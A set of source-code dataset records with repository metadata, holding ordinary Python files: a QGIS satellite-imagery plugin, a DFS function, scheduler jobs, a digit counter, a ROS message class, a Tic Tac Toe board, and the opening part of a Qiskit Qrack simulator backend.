Parkat13.noreply@github.com
|
0e90a272fd779328441e48a2bb4a3f1d546a7a7d
|
7b4fe32969c7cc2e1b709ab7a2e91ccca736ac5a
|
/sat_imagery_manager.py
|
b154d6f5d5d25a04cba6f1bc4546f297496a9ef2
|
[] |
no_license
|
bentrm/sat-imagery-manager
|
202e37037205b544f397e34ce7b7c3d550d7eaa3
|
f98279000c47874eda680d3de9867b5977945993
|
refs/heads/master
| 2020-03-10T14:03:31.968784
| 2018-04-14T14:28:45
| 2018-04-14T14:28:45
| 129,416,406
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,072
|
py
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
SatelliteImageryManager
A QGIS plugin
A plugin that allows to selectivaly load sat imagery.
-------------------
begin : 2018-04-14
git sha : $Format:%H$
copyright : (C) 2018 by Benjamin Thurm
email : bentrm@posteo.de
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from PyQt4.QtCore import QSettings, QTranslator, qVersion, QCoreApplication, Qt
from PyQt4.QtGui import QAction, QIcon
# Initialize Qt resources from file resources.py
import resources
# Import the code for the DockWidget
from sat_imagery_manager_dockwidget import SatelliteImageryManagerDockWidget
import os.path
class SatelliteImageryManager:
"""QGIS Plugin Implementation."""
def __init__(self, iface):
"""Constructor.
:param iface: An interface instance that will be passed to this class
which provides the hook by which you can manipulate the QGIS
application at run time.
:type iface: QgisInterface
"""
# Save reference to the QGIS interface
self.iface = iface
# initialize plugin directory
self.plugin_dir = os.path.dirname(__file__)
# initialize locale
locale = QSettings().value('locale/userLocale')[0:2]
locale_path = os.path.join(
self.plugin_dir,
'i18n',
'SatelliteImageryManager_{}.qm'.format(locale))
if os.path.exists(locale_path):
self.translator = QTranslator()
self.translator.load(locale_path)
if qVersion() > '4.3.3':
QCoreApplication.installTranslator(self.translator)
# Declare instance attributes
self.actions = []
self.menu = self.tr(u'&Satellite imagery')
# TODO: We are going to let the user set this up in a future iteration
self.toolbar = self.iface.addToolBar(u'SatelliteImageryManager')
self.toolbar.setObjectName(u'SatelliteImageryManager')
#print "** INITIALIZING SatelliteImageryManager"
self.pluginIsActive = False
self.dockwidget = None
# noinspection PyMethodMayBeStatic
def tr(self, message):
"""Get the translation for a string using Qt translation API.
We implement this ourselves since we do not inherit QObject.
:param message: String for translation.
:type message: str, QString
:returns: Translated version of message.
:rtype: QString
"""
# noinspection PyTypeChecker,PyArgumentList,PyCallByClass
return QCoreApplication.translate('SatelliteImageryManager', message)
def add_action(
self,
icon_path,
text,
callback,
enabled_flag=True,
add_to_menu=True,
add_to_toolbar=True,
status_tip=None,
whats_this=None,
parent=None):
"""Add a toolbar icon to the toolbar.
:param icon_path: Path to the icon for this action. Can be a resource
path (e.g. ':/plugins/foo/bar.png') or a normal file system path.
:type icon_path: str
:param text: Text that should be shown in menu items for this action.
:type text: str
:param callback: Function to be called when the action is triggered.
:type callback: function
:param enabled_flag: A flag indicating if the action should be enabled
by default. Defaults to True.
:type enabled_flag: bool
:param add_to_menu: Flag indicating whether the action should also
be added to the menu. Defaults to True.
:type add_to_menu: bool
:param add_to_toolbar: Flag indicating whether the action should also
be added to the toolbar. Defaults to True.
:type add_to_toolbar: bool
:param status_tip: Optional text to show in a popup when mouse pointer
hovers over the action.
:type status_tip: str
:param parent: Parent widget for the new action. Defaults None.
:type parent: QWidget
:param whats_this: Optional text to show in the status bar when the
mouse pointer hovers over the action.
:returns: The action that was created. Note that the action is also
added to self.actions list.
:rtype: QAction
"""
icon = QIcon(icon_path)
action = QAction(icon, text, parent)
action.triggered.connect(callback)
action.setEnabled(enabled_flag)
if status_tip is not None:
action.setStatusTip(status_tip)
if whats_this is not None:
action.setWhatsThis(whats_this)
if add_to_toolbar:
self.toolbar.addAction(action)
if add_to_menu:
self.iface.addPluginToRasterMenu(
self.menu,
action)
self.actions.append(action)
return action
def initGui(self):
"""Create the menu entries and toolbar icons inside the QGIS GUI."""
icon_path = ':/plugins/SatelliteImageryManager/icon.png'
self.add_action(
icon_path,
text=self.tr(u'Satellite Imagery Manager'),
callback=self.run,
parent=self.iface.mainWindow())
#--------------------------------------------------------------------------
def onClosePlugin(self):
"""Cleanup necessary items here when plugin dockwidget is closed"""
#print "** CLOSING SatelliteImageryManager"
# disconnects
self.dockwidget.closingPlugin.disconnect(self.onClosePlugin)
# remove this statement if dockwidget is to remain
# for reuse if plugin is reopened
# Commented next statement since it causes QGIS crashe
# when closing the docked window:
# self.dockwidget = None
self.pluginIsActive = False
def unload(self):
"""Removes the plugin menu item and icon from QGIS GUI."""
#print "** UNLOAD SatelliteImageryManager"
for action in self.actions:
self.iface.removePluginRasterMenu(
self.tr(u'&Satellite imagery'),
action)
self.iface.removeToolBarIcon(action)
# remove the toolbar
del self.toolbar
#--------------------------------------------------------------------------
def run(self):
"""Run method that loads and starts the plugin"""
if not self.pluginIsActive:
self.pluginIsActive = True
#print "** STARTING SatelliteImageryManager"
# dockwidget may not exist if:
# first run of plugin
# removed on close (see self.onClosePlugin method)
if self.dockwidget == None:
# Create the dockwidget (after translation) and keep reference
self.dockwidget = SatelliteImageryManagerDockWidget()
# connect to provide cleanup on closing of dockwidget
self.dockwidget.closingPlugin.connect(self.onClosePlugin)
# show the dockwidget
# TODO: fix to allow choice of dock location
self.iface.addDockWidget(Qt.RightDockWidgetArea, self.dockwidget)
self.dockwidget.show()
|
[
"bentrm@posteo.de"
] |
bentrm@posteo.de
|
b5b9a5883683982bf323739f15380c66d9818d4c
|
c6e8d81ab20b31df5821794986cafc468940f745
|
/graph_code/stephen_dfs.py
|
db0dcbbfe382eb56ca9e6c3ebedf23d4be4fde8a
|
[
"MIT"
] |
permissive
|
Mewzyk/stephen_AI
|
31722a54cfcd13691f2200db711d78283f5718d5
|
9e1cc920619581318c35959a3d888808edf6f959
|
refs/heads/master
| 2021-09-04T19:58:33.861993
| 2018-01-21T23:33:02
| 2018-01-21T23:33:02
| 115,215,282
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 696
|
py
|
"""
Stack Implmentation of DFS
Designed to work with the graph implemntation in stephen_graph.py
@Date: 23 December 2017
@Author: Stephen Thomas
"""
"""
Params ->
@start_node: node to start DFS on
@dest_node: node attempting to find a path to
Output ->
List containing visited nodes
"""
def dfs(start_node, dest_node, visited=None, path=None):
if visited is None:
visited = set()
path = []
visited.add(start_node)
path.append(start_node.key)
if start_node is dest_node: return path
for neighbor in start_node.neighbors:
if neighbor not in visited:
dfs(neighbor, dest_node, visited, path)
if dest_node.key in path: return path
|
[
"mewzyk@gmail.com"
] |
mewzyk@gmail.com
|
0aa6a6e4405e77c19691ecef94d8839727f1374f
|
c510eeda3bdc881c0bb40ac872ee969b592b7c59
|
/python project/app/jobs/jobs.py
|
8eb2da55e144aa4ace886a0747228a49da0adfd3
|
[] |
no_license
|
tansuluu/FaceRecognation
|
6e3ab828683876560a4162a5561264fe1d173f22
|
f733b2799e9cb1450e0881bd8e18f6b16356f830
|
refs/heads/master
| 2022-12-11T08:24:14.068300
| 2020-05-21T19:36:43
| 2020-05-21T19:36:43
| 243,033,678
| 0
| 0
| null | 2022-12-08T01:23:57
| 2020-02-25T15:27:04
|
CSS
|
UTF-8
|
Python
| false
| false
| 1,038
|
py
|
import atexit
import datetime
from apscheduler.schedulers.background import BackgroundScheduler
from app.service.person_service import start_process_person
from app.service.request_service import request_process
def run_request():
from app import app, log
log("in run_request")
print("in run_request")
request_process()
print("after run_request")
def process_person():
from app import app, log
log("in process_person")
print("in process_person")
start_process_person()
print("after process_person")
def run_schedule():
from app import app, log
if not app.debug:
scheduler = BackgroundScheduler()
scheduler.add_job(run_request, 'interval', seconds=20, replace_existing=True, id='verify_new_subscribers')
scheduler.add_job(process_person, 'interval', seconds=20, replace_existing=True, id='process_person')
app.logger.info("Added jobs")
scheduler.start()
log("Started scheduler")
atexit.register(lambda: scheduler.shutdown())
|
[
"tansuluu.myrzaeva@iaau.edu.kg"
] |
tansuluu.myrzaeva@iaau.edu.kg
|
51971c3a03213d0a52e3c33361722b36b98c620a
|
356bdc3c82db97fb4d611c8ed6fa6191241685fc
|
/digit_in_integer.py
|
e8969f52ac8324ede5ac8a17b2ff51aaf7e57315
|
[] |
no_license
|
Sireesha0907/python-programs
|
f44a354ecfcf675c3386919d345d18bd390578b8
|
36939441a234aff9183a03c24e3ba0f43e4c6afc
|
refs/heads/master
| 2020-06-20T12:07:43.830643
| 2019-07-19T06:38:28
| 2019-07-19T06:38:28
| 197,117,440
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 176
|
py
|
d=int(input("Enter an Integer Number :"))
count=0
while(d>0):
d=d//10
count=count+1
print("The Number of Digits in Integer is: ",count)
|
[
"noreply@github.com"
] |
Sireesha0907.noreply@github.com
|
062e8edc7abc7677805a44d26f2ac8dd011881cb
|
db1a43b036048db8f19a040270658557a90b310b
|
/catkin_ws/devel/lib/python2.7/dist-packages/basics/msg/_TimerGoal.py
|
33b744bf288125d47c3fec9ba5ab39cfbce419d7
|
[] |
no_license
|
caocaomomo/hello-world
|
caa559cb172492f551c36190ef59404234b86dcc
|
8e93ca5d8bbb4b69edeee9b7982a23d06924795c
|
refs/heads/master
| 2020-03-12T03:57:05.214002
| 2018-04-21T04:49:34
| 2018-04-21T04:49:34
| 130,434,490
| 0
| 0
| null | 2018-04-21T03:15:43
| 2018-04-21T03:00:30
| null |
UTF-8
|
Python
| false
| false
| 4,073
|
py
|
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from basics/TimerGoal.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import genpy
class TimerGoal(genpy.Message):
_md5sum = "861563d4afc38bffed1a53c61a474261"
_type = "basics/TimerGoal"
_has_header = False #flag to mark the presence of a Header object
_full_text = """# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
duration time_to_wait
"""
__slots__ = ['time_to_wait']
_slot_types = ['duration']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
time_to_wait
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(TimerGoal, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.time_to_wait is None:
self.time_to_wait = genpy.Duration()
else:
self.time_to_wait = genpy.Duration()
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_2i().pack(_x.time_to_wait.secs, _x.time_to_wait.nsecs))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.time_to_wait is None:
self.time_to_wait = genpy.Duration()
end = 0
_x = self
start = end
end += 8
(_x.time_to_wait.secs, _x.time_to_wait.nsecs,) = _get_struct_2i().unpack(str[start:end])
self.time_to_wait.canon()
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_2i().pack(_x.time_to_wait.secs, _x.time_to_wait.nsecs))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.time_to_wait is None:
self.time_to_wait = genpy.Duration()
end = 0
_x = self
start = end
end += 8
(_x.time_to_wait.secs, _x.time_to_wait.nsecs,) = _get_struct_2i().unpack(str[start:end])
self.time_to_wait.canon()
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_2i = None
def _get_struct_2i():
global _struct_2i
if _struct_2i is None:
_struct_2i = struct.Struct("<2i")
return _struct_2i
|
[
"114707550@qq.com"
] |
114707550@qq.com
|
e07f4054dcc9dc4d0fb26e7a66d83c8dcfec6da9
|
56d8c675f9be578e416edd3c702a9a10c4b97dda
|
/TicTacToe/board.py
|
d65f5c6fc3bd8056caf7083337039914c14d37a1
|
[] |
no_license
|
TimothyK/TicTacToe
|
9c1275d8789e9d320de03d8612f708e8ec88a600
|
4610b99743adeeb053868eb89cab043407b83044
|
refs/heads/master
| 2022-10-09T14:32:02.342011
| 2020-06-10T05:06:35
| 2020-06-10T05:06:35
| 271,183,732
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,943
|
py
|
'''board - Tic Tac Toe board'''
from colorama import init
from colorama import Fore, Style
class Board:
'''
Tic Tac Toe Board
'''
def __init__(self):
self.__board = [str(x) for x in list(range(1, 10))]
init()
def __row(self, row_num):
return self.__board[(row_num-1)*3:row_num*3]
def __rows(self):
return [self.__row(x) for x in range(1, 4)]
def __lines(self):
def col(col_num):
return self.__board[col_num-1:9:3]
def cols():
return [col(x) for x in range(1, 4)]
def forward_cross_line():
return [self.__board[0]] + [self.__board[4]] + [self.__board[8]]
def back_cross_line():
return [self.__board[2]] + [self.__board[4]] + [self.__board[6]]
def cross():
return [forward_cross_line(), back_cross_line()]
return self.__rows() + cols() + cross()
def print_board(self):
''' Prints the Tic Tac Toe board, with available selections '''
def add_color(marker):
#program must be run from a command line to see the colors.
if marker == 'X':
return Style.BRIGHT + Fore.YELLOW + marker + Fore.RESET + Style.RESET_ALL
if marker == 'O':
return Style.BRIGHT + Fore.GREEN + marker + Fore.RESET + Style.RESET_ALL
return marker
def print_row(row):
print(' '.join(add_color(x) for x in row))
for row in self.__rows()[::-1]:
print_row(row)
print(Fore.RESET)
def available_inputs(self):
''' Lists available selections for the player to put their mark '''
return [x for x in self.__board if x.isdigit()]
def change_cell(self, cell, player_mark):
'''
Changes a cell to the player's mark
Args:
cell (str): should be a value returned from available_inputs
player_mark (str): 'X' or 'O'
'''
pos = int(cell)-1
self.__board[pos] = player_mark
def winner(self):
'''
Returns the winner of the game 'X' or 'O'.
Returns False if there is no winner.
'''
def line_winner(line):
token = set(line)
if len(token) == 1:
return token.pop()
return False
for line in self.__lines():
if line_winner(line):
return line_winner(line)
return False
def is_game_over(self):
''' Reports (bool) if game has a winner or is a draw '''
return self.available_inputs() == [] or self.winner()
def print_game_result(self):
''' Prints the final result of the game, including game board '''
print()
winner = self.winner()
if not winner:
print("The game is a draw")
else:
print("The winner is player {}".format(winner))
self.print_board()
|
[
"timothy.klenke@gmail.com"
] |
timothy.klenke@gmail.com
|
04cbeb465a02df5445972cb1bd6d360afe2e387a
|
bd6260082118b45942f319169e82ee5a2d8cc5e1
|
/qiskit/providers/qrack/backends/qasm_simulator.py
|
ca189a4f1fe5bd6113ef0b7bb4d616ce4ac70e96
|
[
"Apache-2.0"
] |
permissive
|
vm6502q/qiskit-qrack-provider
|
e73040040945507498cbc014b9331946ee373404
|
73f70fde60f0fda361a46f874e7eda2ea84038f1
|
refs/heads/master
| 2023-06-26T21:47:20.603420
| 2023-06-20T19:29:14
| 2023-06-20T19:29:14
| 186,687,718
| 1
| 1
|
Apache-2.0
| 2022-03-12T23:05:03
| 2019-05-14T19:34:28
|
Python
|
UTF-8
|
Python
| false
| false
| 37,513
|
py
|
# This code is based on and adapted from https://github.com/Qiskit/qiskit-qcgpu-provider/blob/master/qiskit_qcgpu_provider/qasm_simulator.py
#
# Adapted by Daniel Strano. Many thanks to Adam Kelly for pioneering a third-party Qiskit provider.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
# pylint: disable=invalid-name
import uuid
import time
import numpy as np
import pandas as pd
from datetime import datetime
from collections import Counter
from qiskit.providers.models import BackendConfiguration
from ..version import __version__
from ..qrackjob import QrackJob
from ..qrackerror import QrackError
from pyqrack import QrackSimulator, Pauli
from qiskit.providers.backend import BackendV1
from qiskit.result import Result
from qiskit.providers.options import Options
from qiskit.circuit.gate import Gate
from qiskit.circuit.quantumcircuit import QuantumCircuit
from qiskit.qobj.qasm_qobj import QasmQobjExperiment, QasmQobjInstruction
from qiskit.circuit.classicalregister import Clbit
class QrackQasmQobjInstructionConditional:
def __init__(self, mask, val):
self.mask = mask
self.val = val
def to_dict(self):
return vars(self)
class QrackExperimentHeader(dict):
def __init__(self, a_dict=None):
dict.__init__(self)
for key, value in a_dict.items():
self[key] = value
def to_dict(self):
return self
class QrackExperimentResultHeader:
def __init__(self, name):
self.name = name
def to_dict(self):
return vars(self)
class QrackExperimentResultData:
def __init__(self, counts, memory):
self.counts = counts
self.memory = memory
def to_dict(self):
return vars(self)
class QrackExperimentResult:
def __init__(self, shots, data, status, success, header, meta_data = None, time_taken = None):
self.shots = shots
self.data = data
self.status = status
self.success = success
self.header = header
self.meta_data = meta_data,
self.time_taken = time_taken
def to_dict(self):
return vars(self)
class QasmSimulator(BackendV1):
"""
Contains an OpenCL based backend
"""
DEFAULT_OPTIONS = {
'method': 'automatic',
'shots': 1024,
'is_schmidt_decompose_multi': True,
'is_schmidt_decompose': True,
'is_stabilizer_hybrid': True,
'is_binary_decision_tree': False,
'is_paged': True,
'is_cpu_gpu_hybrid': True,
'is_host_pointer': False,
'is_t_injected': True,
'is_reactively_separated': True
}
DEFAULT_CONFIGURATION = {
'backend_name': 'statevector_simulator',
'backend_version': __version__,
'n_qubits': 64,
'conditional': True,
'url': 'https://github.com/vm6502q/qiskit-qrack-provider',
'simulator': True,
'local': True,
'open_pulse': False,
'memory': True,
'max_shots': 65536,
'description': 'An OpenCL based qasm simulator',
'coupling_map': None,
'basis_gates': [
'id', 'u', 'u1', 'u2', 'u3', 'r', 'rx', 'ry', 'rz',
'h', 'x', 'y', 'z', 's', 'sdg', 'sx', 'sxdg', 'p', 't', 'tdg',
'cu', 'cu1', 'cu2', 'cu3', 'cx', 'cy', 'cz', 'ch', 'cp', 'csx', 'csxdg', 'dcx',
'ccx', 'ccy', 'ccz', 'mcx', 'mcy', 'mcz', 'mcu', 'mcu1', 'mcu2', 'mcu3',
'swap', 'iswap', 'cswap', 'mcswap', 'reset', 'measure', 'barrier'
],
'gates': [{
'name': 'id',
'parameters': [],
'conditional': True,
'description': 'Single-qubit identity gate',
'qasm_def': 'gate id a { U(0,0,0) a; }'
}, {
'name': 'u',
'parameters': ['theta', 'phi', 'lam'],
'conditional': True,
'description': 'Single-qubit gate with three rotation angles',
'qasm_def': 'gate u(theta,phi,lam) q { U(theta,phi,lam) q; }'
}, {
'name': 'u1',
'parameters': ['lam'],
'conditional': True,
'description': 'Single-qubit gate [[1, 0], [0, exp(1j*lam)]]',
'qasm_def': 'gate u1(lam) q { U(0,0,lam) q; }'
}, {
'name': 'u2',
'parameters': ['phi', 'lam'],
'conditional': True,
'description':
'Single-qubit gate [[1, -exp(1j*lam)], [exp(1j*phi), exp(1j*(phi+lam))]]/sqrt(2)',
'qasm_def': 'gate u2(phi,lam) q { U(pi/2,phi,lam) q; }'
}, {
'name': 'u3',
'parameters': ['theta', 'phi', 'lam'],
'conditional': True,
'description': 'Single-qubit gate with three rotation angles',
'qasm_def': 'gate u3(theta,phi,lam) q { U(theta,phi,lam) q; }'
}, {
'name': 'r',
'parameters': ['lam'],
'conditional': True,
'description': 'Single-qubit gate [[1, 0], [0, exp(1j*lam)]]',
'qasm_def': 'gate p(lam) q { U(0,0,lam) q; }'
}, {
'name': 'rx',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Pauli-X axis rotation gate',
'qasm_def': 'TODO'
}, {
'name': 'ry',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Pauli-Y axis rotation gate',
'qasm_def': 'TODO'
}, {
'name': 'rz',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Pauli-Z axis rotation gate',
'qasm_def': 'TODO'
}, {
'name': 'h',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Hadamard gate',
'qasm_def': 'TODO'
}, {
'name': 'x',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Pauli-X gate',
'qasm_def': 'gate x a { U(pi,0,pi) a; }'
}, {
'name': 'y',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Pauli-Y gate',
'qasm_def': 'TODO'
}, {
'name': 'z',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Pauli-Z gate',
'qasm_def': 'TODO'
}, {
'name': 's',
'parameters': [],
'conditional': True,
'description': 'Single-qubit phase gate',
'qasm_def': 'TODO'
}, {
'name': 'sdg',
'parameters': [],
'conditional': True,
'description': 'Single-qubit adjoint phase gate',
'qasm_def': 'TODO'
}, {
'name': 'sx',
'parameters': [],
'conditional': True,
'description': 'Single-qubit square root of Pauli-X gate',
'qasm_def': 'gate sx a { rz(-pi/2) a; h a; rz(-pi/2); }'
}, {
'name': 'sxdg',
'parameters': [],
'conditional': True,
'description': 'Single-qubit inverse square root of Pauli-X gate',
'qasm_def': 'TODO'
}, {
'name': 'p',
'parameters': ['theta', 'phi'],
'conditional': True,
'description': 'Single-qubit gate [[cos(theta), -1j*exp(-1j*phi)], [sin(theta), -1j*exp(1j *phi)*sin(theta), cos(theta)]]',
'qasm_def': 'gate r(theta, phi) q { U(theta, phi - pi/2, -phi + pi/2) q;}'
}, {
'name': 't',
'parameters': [],
'conditional': True,
'description': 'Single-qubit T gate',
'qasm_def': 'TODO'
}, {
'name': 'tdg',
'parameters': [],
'conditional': True,
'description': 'Single-qubit adjoint T gate',
'qasm_def': 'TODO'
}, {
'name': 'cu',
'parameters': ['theta', 'phi', 'lam'],
'conditional': True,
'description': 'Two-qubit Controlled-u gate',
'qasm_def': 'TODO'
}, {
'name': 'cu1',
'parameters': ['lam'],
'conditional': True,
'description': 'Two-qubit Controlled-u1 gate',
'qasm_def': 'TODO'
}, {
'name': 'cu2',
'parameters': ['phi', 'lam'],
'conditional': True,
'description': 'Two-qubit Controlled-u2 gate',
'qasm_def': 'TODO'
}, {
'name': 'cu3',
'parameters': ['theta', 'phi', 'lam'],
'conditional': True,
'description': 'Two-qubit Controlled-u3 gate',
'qasm_def': 'TODO'
}, {
'name': 'cx',
'parameters': [],
'conditional': True,
'description': 'Two-qubit Controlled-NOT gate',
'qasm_def': 'gate cx c,t { CX c,t; }'
}, {
'name': 'cy',
'parameters': [],
'conditional': True,
'description': 'Two-qubit Controlled-Y gate',
'qasm_def': 'TODO'
}, {
'name': 'cz',
'parameters': [],
'conditional': True,
'description': 'Two-qubit Controlled-Z gate',
'qasm_def': 'gate cz a,b { h b; cx a,b; h b; }'
}, {
'name': 'ch',
'parameters': [],
'conditional': True,
'description': 'Two-qubit Controlled-H gate',
'qasm_def': 'TODO'
}, {
'name': 'cp',
'parameters': [],
'conditional': True,
'description': 'Controlled-Phase gate',
'qasm_def': 'TODO'
}, {
'name': 'csx',
'parameters': [],
'conditional': True,
'description': 'Two-qubit Controlled square root of Pauli-X gate',
'qasm_def': 'TODO'
}, {
'name': 'csxdg',
'parameters': [],
'conditional': True,
'description': 'Two-qubit controlled inverse square root of Pauli-X gate',
'qasm_def': 'TODO'
}, {
'name': 'dcx',
'parameters': [],
'conditional': True,
'description': 'Double-CNOT gate',
'qasm_def': 'TODO'
}, {
'name': 'ccx',
'parameters': [],
'conditional': True,
'description': 'Three-qubit Toffoli gate',
'qasm_def': 'TODO'
}, {
'name': 'ccy',
'parameters': [],
'conditional': True,
'description': 'Three-qubit controlled-Y gate',
'qasm_def': 'TODO'
}, {
'name': 'ccz',
'parameters': [],
'conditional': True,
'description': 'Three-qubit controlled-Z gate',
'qasm_def': 'TODO'
}, {
'name': 'mcx',
'parameters': [],
'conditional': True,
'description': 'N-qubit multi-controlled-X gate',
'qasm_def': 'TODO'
}, {
'name': 'mcy',
'parameters': [],
'conditional': True,
'description': 'N-qubit multi-controlled-Y gate',
'qasm_def': 'TODO'
}, {
'name': 'mcz',
'parameters': [],
'conditional': True,
'description': 'N-qubit multi-controlled-Z gate',
'qasm_def': 'TODO'
}, {
'name': 'mcu',
'parameters': ['theta', 'phi', 'lam'],
'conditional': True,
'description': 'N-qubit multi-controlled-u3 gate',
'qasm_def': 'TODO'
}, {
'name': 'mcu1',
'parameters': ['lam'],
'conditional': True,
'description': 'N-qubit multi-controlled-u1 gate',
'qasm_def': 'TODO'
}, {
'name': 'mcu2',
'parameters': ['phi', 'lam'],
'conditional': True,
'description': 'N-qubit multi-controlled-u2 gate',
'qasm_def': 'TODO'
}, {
'name': 'mcu3',
'parameters': ['theta', 'phi', 'lam'],
'conditional': True,
'description': 'N-qubit multi-controlled-u3 gate',
'qasm_def': 'TODO'
}, {
'name': 'swap',
'parameters': [],
'conditional': True,
'description': 'Two-qubit SWAP gate',
'qasm_def': 'TODO'
}, {
'name': 'iswap',
'parameters': [],
'conditional': True,
'description': 'Two-qubit ISWAP gate',
'qasm_def': 'TODO'
}, {
'name': 'cswap',
'parameters': [],
'conditional': True,
'description': 'Three-qubit Fredkin (controlled-SWAP) gate',
'qasm_def': 'TODO'
}, {
'name': 'mcswap',
'parameters': [],
'conditional': True,
'description': 'N-qubit multi-controlled-SWAP gate',
'qasm_def': 'TODO'
}, {
'name': 'measure',
'parameters': [],
'conditional': True,
'description': 'Measure qubit',
'qasm_def': 'TODO'
}, {
'name': 'reset',
'parameters': [],
'conditional': True,
'description': 'Reset qubit to 0 state',
'qasm_def': 'TODO'
}, {
'name': 'barrier',
'parameters': [],
'conditional': True,
'description': 'Barrier primitive for quantum circuit',
'qasm_def': 'TODO'
}]
}
def __init__(self, configuration=None, provider=None, **fields):
"""Initialize a backend class
Args:
configuration (BackendConfiguration): A backend configuration
object for the backend object.
provider (qiskit.providers.Provider): Optionally, the provider
object that this Backend comes from.
fields: kwargs for the values to use to override the default
options.
Raises:
AttributeError: if input field not a valid options
..
This next bit is necessary just because autosummary generally won't summarise private
methods; changing that behaviour would have annoying knock-on effects through all the
rest of the documentation, so instead we just hard-code the automethod directive.
In addition to the public abstract methods, subclasses should also implement the following
private methods:
.. automethod:: _default_options
"""
configuration = configuration or BackendConfiguration.from_dict(self.DEFAULT_CONFIGURATION)
self._number_of_qubits = 0
self._number_of_clbits = 0
self._shots = 1
self._configuration = configuration
self._options = self._default_options()
self._provider = provider
if fields:
for field in fields:
if field not in self.DEFAULT_OPTIONS:
raise AttributeError("Options field %s is not valid for this backend" % field)
self._options.update_options(**fields)
@classmethod
def _default_options(cls):
"""Return the default options
This method will return a :class:`qiskit.providers.Options`
subclass object that will be used for the default options. These
should be the default parameters to use for the options of the
backend.
Returns:
qiskit.providers.Options: A options object with
default values set
"""
# WARNING: The above prototype for return type doesn't work in BackEndV1 in Qiskit v0.30.0.
# We're resorting to duck typing.
_def_opts = Options()
_def_opts.update_options(**cls.DEFAULT_OPTIONS)
return _def_opts
def run(self, run_input, **options):
"""Run on the backend.
This method that will return a :class:`~qiskit.providers.Job` object
that run circuits. Depending on the backend this may be either an async
or sync call. It is the discretion of the provider to decide whether
running should block until the execution is finished or not. The Job
class can handle either situation.
Args:
run_input (QuantumCircuit or Schedule or list): An individual or a
list of :class:`~qiskit.circuits.QuantumCircuit` or
:class:`~qiskit.pulse.Schedule` objects to run on the backend.
For legacy providers migrating to the new versioned providers,
provider interface a :class:`~qiskit.qobj.QasmQobj` or
:class:`~qiskit.qobj.PulseQobj` objects should probably be
supported too (but deprecated) for backwards compatibility. Be
sure to update the docstrings of subclasses implementing this
method to document that. New provider implementations should not
do this though as :mod:`qiskit.qobj` will be deprecated and
removed along with the legacy providers interface.
options: Any kwarg options to pass to the backend for running the
config. If a key is also present in the options
attribute/object then the expectation is that the value
specified will be used instead of what's set in the options
object.
Returns:
Job: The job object for the run
"""
qrack_options = {
'isSchmidtDecomposeMulti': options.is_schmidt_decompose_multi if hasattr(options, 'is_schmidt_decompose_multi') else self._options.get('is_schmidt_decompose_multi'),
'isSchmidtDecompose': options.is_schmidt_decompose if hasattr(options, 'is_schmidt_decompose') else self._options.get('is_schmidt_decompose'),
'isStabilizerHybrid': options.is_stabilizer_hybrid if hasattr(options, 'is_stabilizer_hybrid') else self._options.get('is_stabilizer_hybrid'),
'isBinaryDecisionTree': options.is_binary_decision_tree if hasattr(options, 'is_binary_decision_tree') else self._options.get('is_binary_decision_tree'),
'isPaged': options.is_paged if hasattr(options, 'is_paged') else self._options.get('is_paged'),
'isCpuGpuHybrid': options.is_cpu_gpu_hybrid if hasattr(options, 'is_cpu_gpu_hybrid') else self._options.get('is_cpu_gpu_hybrid'),
'isHostPointer': options.is_host_pointer if hasattr(options, 'is_host_pointer') else self._options.get('is_host_pointer'),
}
data = run_input.config.memory if hasattr(run_input, 'config') else []
self._shots = options['shots'] if 'shots' in options else (run_input.config.shots if hasattr(run_input, 'config') else self._options.get('shots'))
